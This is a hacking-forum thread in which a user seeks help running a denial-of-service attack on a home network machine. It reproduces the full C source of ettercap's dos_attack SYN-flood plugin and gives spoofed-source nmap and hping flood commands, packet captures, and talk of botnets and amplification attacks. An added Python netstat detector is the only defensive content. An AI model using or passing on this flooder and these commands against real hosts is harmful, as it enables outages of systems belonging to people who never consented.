Bigmac

dos attack

27 posts in this topic

I would like to perform a dos attack on one of my computers... the only tutorials i can find are on website/servers. . .

can someone show me how. . . maybe a list of tools. . .

(dos|ddos) != hacking

syn floods with spoofed ip addresses

i think i understand the concept. . .

i could set up a game server on my network. . . how could i flood this server with syn packets...

The wikipedia webpage: http://en.wikipedia.org/wiki/SYN_flood provides some decent information concerning this type of SYN flood.

There's many other ways to dos someone as well.

I'm not sure of any windows applications (which I'm automatically assuming you're using) that can/will do this for you automatically, I believe the typical attacks originate from *nix based OS's

i have backtrack2 running from virtualbox. . .

I believe Backtrack's wiki and its forums provide support for all utilities -- if you do a search you should be able to find something on doing FLOODING of different types...

I believe it comes with ettercap which also has a DOS_ATTACK plugin

EDIT:

Visit : http://backtrack.offensive-security.com/index.php/Tools

It shows all the tools that Backtrack 2 comes with (At least most)

I didn't see anything specific related to DOS attacking however

Edited by friendless

I did try the dos_attack plug within ettercap. . . works like a charm. . .

Does this work across the internet.

How did I know this was coming ... ? ...

Because we were all there once... Then we found better things than performing DDOS over the net to others' networks.

Oh and to answer your question about the "does this work across the internet??"

Yes

I do not know about Ettercap but it does with other programs.

How about trying to make your own program that does a DDOS.

That would help you more in hacking because then you will know how a DDOS really works and what it takes to get it to do what it is doing. :D

biosphear

ettercap did work. . . I take it you have to learn C or C++. . .

Most ISPs do not allow spoofed ip addresses.

I would like to test this. . . I need a tip. . . how could my sister detect this dos attack and then let me know if the ip was spoofed or not

ettercap did work. . . I take it you have to learn C or C++. . .

Yes.

C is always a good base to have when hacking.

Programming will help you in hacking even if you do not like to program.

I know programming has helped me in so many ways.

Remember you can know how something works but you should always know why it works, and how it is made possible.

biosphear

So how can i monitor this dos attack. netstat?

Edit:

so i did check the netstat -a and there was about 200 connections established. . .

Edited by 1qwert
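
Added example, not part of the original posts: a defender-side answer to the netstat question above. It reads `netstat -an` output and flags both a half-open backlog on one port (SYN_RECV on Linux, SYN_RECEIVED on Windows) and the pattern reported in the post, many ESTABLISHED connections from a single remote address. The function names and thresholds are assumptions, and the sample rows are constructed.

```python
import re
from collections import Counter

# Half-open state as named by Linux and by Windows netstat
HALF_OPEN = {"SYN_RECV", "SYN_RECEIVED"}
# Windows rows: TCP local remote STATE; Linux rows: tcp recvq sendq local remote STATE
ROW = re.compile(
    r"^\s*[Tt][Cc][Pp]\S*\s+(?:\d+\s+\d+\s+)?(\S+)\s+(\S+)\s+([A-Z][A-Z_0-9]+)")

def detect(netstat_text, half_open_limit=50, per_remote_limit=100):
    """Return sorted alerts for `netstat -an` text (limits are assumed values)."""
    half_open = Counter()    # local port -> half-open connection count
    established = Counter()  # (remote ip, local port) -> completed connections
    for line in netstat_text.splitlines():
        m = ROW.match(line)
        if not m:
            continue  # header, UDP row or blank line
        local, remote, state = m.groups()
        lport = local.rpartition(":")[2]
        rip = remote.rpartition(":")[0]
        if state in HALF_OPEN:
            half_open[lport] += 1
        elif state == "ESTABLISHED":
            established[(rip, lport)] += 1
    alerts = [("syn_backlog", port, n)
              for port, n in half_open.items() if n > half_open_limit]
    alerts += [("conn_exhaustion", f"{rip}->{port}", n)
               for (rip, port), n in established.items() if n > per_remote_limit]
    return sorted(alerts)

def constructed_sample():
    """Constructed netstat output, not captured from a real host."""
    rows = ["Proto  Local Address         Foreign Address        State",
            "TCP    0.0.0.0:135           0.0.0.0:0              LISTENING",
            "TCP    192.168.254.2:3389    192.168.254.5:51000    ESTABLISHED",
            "UDP    0.0.0.0:137           *:*"]
    # 200 completed handshakes from one address, as the post's netstat -a showed
    rows += [f"TCP    192.168.254.2:135    192.168.254.99:{49901 + i}  ESTABLISHED"
             for i in range(200)]
    # 60 half-open entries on port 445, in Windows and Linux row formats
    rows += [f"TCP    192.168.254.2:445    198.51.100.{i}:1025   SYN_RECEIVED"
             for i in range(1, 31)]
    rows += [f"tcp   0   0 192.168.254.2:445  203.0.113.{i}:1025  SYN_RECV"
             for i in range(1, 31)]
    return "\n".join(rows)

if __name__ == "__main__":
    for alert in detect(constructed_sample()):
        print(alert)
```

A half-open backlog spread over many source addresses points to spoofed SYNs, while a pile of completed connections from one address is what the packet capture later in the thread shows for the plugin.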

um. . . i have this idea. . . what if each and every ip was spoofed at random. . .

Edit: is this C++

/*
dos_attack -- ettercap plugin -- Run a D.O.S. attack (based on Naptha)

Copyright © ALoR & NaGA

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.

$Id: dos_attack.c,v 1.8 2004/11/04 09:23:02 alor Exp $
*/


#include <ec.h> /* required for global variables */
#include <ec_plugins.h> /* required for plugin ops */
#include <ec_hook.h>
#include <ec_packet.h>
#include <ec_send.h>
#include <ec_threads.h>

/* protos */
int plugin_load(void *);
static int dos_attack_init(void *);
static int dos_attack_fini(void *);
static void parse_arp(struct packet_object *po);
static void parse_tcp(struct packet_object *po);
EC_THREAD_FUNC(syn_flooder);

struct port_list {
u_int16 port;
SLIST_ENTRY(port_list) next;
};


/* globals */
static struct ip_addr fake_host;
static struct ip_addr victim_host;
SLIST_HEAD(, port_list) port_table;

/* plugin operations */
struct plugin_ops dos_attack_ops = {
/* ettercap version MUST be the global EC_VERSION */
ettercap_version: EC_VERSION,
/* the name of the plugin */
name: "dos_attack",
/* a short description of the plugin (max 50 chars) */
info: "Run a d.o.s. attack against an IP address",
/* the plugin version. */
version: "1.0",
/* activation function */
init: &dos_attack_init,
/* deactivation function */
fini: &dos_attack_fini,
};

/**********************************************************/

/* this function is called on plugin load */
int plugin_load(void *handle)
{
return plugin_register(handle, &dos_attack_ops);
}

/******************* STANDARD FUNCTIONS *******************/

static int dos_attack_init(void *dummy)
{
struct in_addr ipaddr;
char dos_addr[MAX_ASCII_ADDR_LEN];
char unused_addr[MAX_ASCII_ADDR_LEN];
struct port_list *p;

/* It doesn't work if unoffensive */
if (GBL_OPTIONS->unoffensive) {
INSTANT_USER_MSG("dos_attack: plugin doesn't work in UNOFFENSIVE mode\n");
return PLUGIN_FINISHED;
}

/* don't show packets while operating */
GBL_OPTIONS->quiet = 1;

memset(dos_addr, 0, sizeof(dos_addr));
memset(unused_addr, 0, sizeof(dos_addr));

ui_input("Insert victim IP: ", dos_addr, sizeof(dos_addr), NULL);
if (inet_aton(dos_addr, &ipaddr) == 0) {
INSTANT_USER_MSG("dos_attack: Invalid IP address.\n");
return PLUGIN_FINISHED;
}
ip_addr_init(&victim_host, AF_INET, (char *)&ipaddr);

ui_input("Insert unused IP: ", unused_addr, sizeof(unused_addr), NULL);
if (inet_aton(unused_addr, &ipaddr) == 0) {
INSTANT_USER_MSG("dos_attack: Invalid IP address.\n");
return PLUGIN_FINISHED;
}
ip_addr_init(&fake_host, AF_INET, (char *)&ipaddr);

INSTANT_USER_MSG("dos_attack: Starting scan against %s [Fake Host: %s]\n", dos_addr, unused_addr);

/* Delete the "open" port list just in case of previous executions */
while (!SLIST_EMPTY(&port_table)) {
p = SLIST_FIRST(&port_table);
SLIST_REMOVE_HEAD(&port_table, next);
SAFE_FREE(p);
}

/* Add the hook to "create" the fake host */
hook_add(HOOK_PACKET_ARP_RQ, &parse_arp);

/* Add the hook for SYN-ACK reply */
hook_add(HOOK_PACKET_TCP, &parse_tcp);

/* create the flooding thread */
ec_thread_new("golem", "SYN flooder thread", &syn_flooder, NULL);

return PLUGIN_RUNNING;
}


static int dos_attack_fini(void *dummy)
{
pthread_t pid;

/* Remove the hooks */
hook_del(HOOK_PACKET_ARP_RQ, &parse_arp);
hook_del(HOOK_PACKET_TCP, &parse_tcp);

pid = ec_thread_getpid("golem");

/* the thread is active or not ? */
if (!pthread_equal(pid, EC_PTHREAD_NULL))
ec_thread_destroy(pid);

INSTANT_USER_MSG("dos_attack: plugin terminated...\n");

return PLUGIN_FINISHED;
}

/*********************************************************/

/*
* This thread first sends SYN packets to some ports (a little port scan)
* then starts to flood active ports with other SYN packets.
*/
EC_THREAD_FUNC(syn_flooder)
{
u_int16 sport = 0xe77e, dport;
u_int32 seq = 0xabadc0de;
struct port_list *p;

/* init the thread and wait for start up */
ec_thread_init();

/* First "scan" ports from 1 to 1024 */
for (dport=1; dport<1024; dport++) {
send_tcp(&fake_host, &victim_host, sport++, htons(dport), seq++, 0, TH_SYN);
usleep(1000);
}

INSTANT_USER_MSG("dos_attack: Starting attack...\n");

/* Continue flooding open ports */
LOOP {
CANCELLATION_POINT();

SLIST_FOREACH(p, &port_table, next)
send_tcp(&fake_host, &victim_host, sport++, p->port, seq++, 0, TH_SYN);

usleep(500);
}

return NULL;
}

/* Parse the arp packets and reply for the fake host */
static void parse_arp(struct packet_object *po)
{
if (!ip_addr_cmp(&fake_host, &po->L3.dst))
send_arp(ARPOP_REPLY, &po->L3.dst, GBL_IFACE->mac, &po->L3.src, po->L2.src);
}

/*
* Populate the open port list and reply to
* SYN-ACK packets from victim host
*/
static void parse_tcp(struct packet_object *po)
{
struct port_list *p;

/* Check if it's a reply to our SYN flooding */
if (ip_addr_cmp(&fake_host, &po->L3.dst) ||
ip_addr_cmp(&victim_host, &po->L3.src) ||
po->L4.flags != (TH_SYN | TH_ACK))
return;

/* Complete the handshake with an ACK */
send_tcp(&fake_host, &victim_host, po->L4.dst, po->L4.src, po->L4.ack, htonl( ntohl(po->L4.seq) + 1), TH_ACK);

/* Check if the port is already in the "open" list... */
SLIST_FOREACH(p, &port_table, next)
if (p->port == po->L4.src)
return;

/* If not...put it in */
SAFE_CALLOC(p, 1, sizeof(struct port_list));
p->port = po->L4.src;
SLIST_INSERT_HEAD(&port_table, p, next);

INSTANT_USER_MSG("dos_attack: Port %d added\n", ntohs(p->port));
}

/* EOF */

// vim:ts=3:expandtab

Edited by 1qwert

um. . . i have this idea. . . what if each and every ip was spoofed at random. . .

Even less chance of working, ISPs are almost bound to block packages with source IPs (in the header, that is) that they know not to own. If you irk them, they might even try to find out who you are and what your deal is.

Edit: is this C++

That's C

can you do a dos attack with nmap? just spoof the ip and send syn packets???

-nmap -P0 -sS -p 135,139,445 -e eth0 -S 192.168.254.2 192.168.254.5

after doing this nmap scan I then check the netstat of the target and its shows SYN_RECEIVED.

Um. . . shouldn't there be a half open connection with those ports?

Edited by 1qwert

Really, the only way to launch a successful DoS attack these days is with a large botnet at your command. One computer isn't going to do much damage on a professional grade server, unless you have the ability to send packets with spoofed IPs (which has been already stated to be unlikely)

Egress filtering isn't going to stop you from spoofing packets from source addresses that are within your subnet. Botnets are not necessary if you are using a traffic amplification attack (i.e. smurf, dns recursion, etc.) What I consider to be the seminal paper on SYN flooding is Phrack48-13.

Besides, botnets are lame and those who run them and think they're hackers really are nothing but idiots.

I dunno man, there are some pretty sick botnets. It takes more than a modicum of understanding to manage a network that can efficiently scale to tens of thousands of nodes.

Egress filtering isn't going to stop you from spoofing packets from source addresses that are within your subnet. Botnets are not necessary if you are using a traffic amplification attack (i.e. smurf, dns recursion, etc.) What I consider to be the seminal paper on SYN flooding is Phrack48-13.
I have been testing with wireshark and hping.
hping -S -a 192.168.254.99 -p 135 192.168.254.2 --flood

this will flood syn packets with a spoofed ip to port 135. . .

Now with ettercap's Dos_attack plugin. i logged all packets during this attack and i found a pattern. first ettercap will scan the target for open ports then ettercap will attack the open ports. the target computer now thinks there is a connection established(3 way hand shake).

192.168.254.99>	192.168.254.2	TCP	49901 > epmap [SYN] Seq=0 Win=32767 Len=0
192.168.254.2> 192.168.254.99 TCP epmap > 49901 [SYN, ACK] Seq=0 Ack=1 Win=8192 Len=0 MSS=1460
192.168.254.99> 192.168.254.2 TCP 49901 > epmap [ACK] Seq=1 Ack=1 Win=32767 Len=0

Now what i want to point out about this dos_attack plugin. . . any firewall will pick this up because of how it scans for ports.

I would like to try and recreate this with hping.

this is my first attempt.

hping -S -a 198.234.56.67 -p 445 192.168.254.2

hping -A -a 198.234.56.67 -p 445 192.168.254.2

198.255.65.24>	192.168.254.2	TCP	nerv > microsoft-ds [SYN] Seq=0 Win=512 Len=0
192.168.254.2> 198.255.65.24 TCP microsoft-ds > nerv [SYN, ACK] Seq=0 Ack=1 Win=8192 Len=0 MSS=1460
198.255.65.24> 192.168.254.2 TCP webmethods-b2b > microsoft-ds [ACK] Seq=1 Ack=1 Win=512 Len=0 <---
192.168.254.2> 198.255.65.24 TCP microsoft-ds > webmethods-b2b [RST] Seq=1 Win=0 Len=0

I can't establish a connection. The source port and destination port do not match up on the ACK packet so the target responds with a Reset.

There is no port number in the code you quoted, Microsoft turned non-http request packet replies off in their servers.

Seriously, go read a book about networking instead of being a script kiddy. (another one trying to DoS Microsoft... :roll:)

:nono: Look who's talking! There are port numbers in the log that was pasted. It just so happens that the packet dissector is doing a getservbyport(), so it appears as "microsoft-ds" instead of 445, for example. I don't see any Microsoft addresses there either..the source address is unallocated and the destination is an RFC1918 address. :lol: Talk about script kiddies! :stfu: heh.
